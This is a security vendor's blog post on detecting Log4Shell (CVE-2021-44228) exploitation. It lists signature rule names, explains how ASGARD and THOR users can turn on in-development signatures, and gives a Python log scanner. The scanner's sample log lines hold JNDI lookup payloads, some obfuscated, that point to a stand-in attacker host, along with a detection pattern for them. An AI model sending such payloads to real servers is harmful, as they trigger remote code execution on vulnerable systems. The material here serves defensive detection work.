The Log4Shell vulnerability (CVE-2021-44228) in log4j is actively exploited in the wild and highly critical. This blog post lists some important web resources and the signatures that detect exploitation attempts.
Signatures Detecting Log4Shell Attacks
Check for matches with the following rules:
- Log4j RCE CVE-2021-44228 in Fields
- Log4j RCE CVE-2021-44228 Generic
- JNDIExploit Kit Pattern
Look for matches with the following rules that trigger on activity observed in the wild.
- Suspicious Activity in Shell Commands
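As an added example (not one of Nextron's signatures and not code from the original post), the following Python shows what a generic Log4Shell detection rule has to cope with: it URL-decodes each line and flattens the nested lookups used to hide the `${jndi:` token before matching, which goes slightly beyond the rule names listed above. The log lines and the `attacker.invalid` host are constructed for the example.

```python
import re
from urllib.parse import unquote

# Nested Log4j lookups that split the literal "jndi" across several tokens:
# ${lower:j} / ${upper:J} -> j / J ; ${::-d} and ${env:X:-d} -> default value d.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The JNDI lookup itself, matched once any nesting has been flattened.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|http)\s*:",
                   re.IGNORECASE)


def normalize(text: str) -> str:
    """URL-decode and collapse nested lookups until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = unquote(text)
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def is_log4shell_attempt(line: str) -> bool:
    """True if the line carries a JNDI lookup in any of the handled forms."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return only the log lines that look like exploitation attempts."""
    return [line for line in lines if is_log4shell_attempt(line)]


# Constructed access-log lines: one benign request, three lookup variants
# in the User-Agent field, one URL-encoded lookup in the path, one false-positive bait.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [11/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:10:02:17 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.invalid:1389/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:02:18 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}${lower:d}ap://attacker.invalid/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:02:19 +0000] "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.invalid/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:02:20 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.invalid%2Fa%7D HTTP/1.1" 200 "curl/7.68"',
    '10.0.0.7 - - [11/Dec/2021:10:03:01 +0000] "GET /search?q=jndi+ldap+tutorial HTTP/1.1" 200 "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG_LINES):
        print("MATCH:", hit)
```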
It takes us a few days to release new rules. The rules that we wrote over the weekend may not be available on Monday 13th of December. ASGARD users that want to use the signatures that are still in our QS can activate the option for these signatures in “Settings > Advanced > Show Signature SigDev Option”.
After changing the setting, new scans show an additional option in the dropdown menu.
Please contact our support in case of any questions.
Users of our scanner THOR also need to use the signature version that’s in development to get the newest signatures that detect log4j exploitation.
Retrieve that signature pack with:
thor-util.exe update --sigdev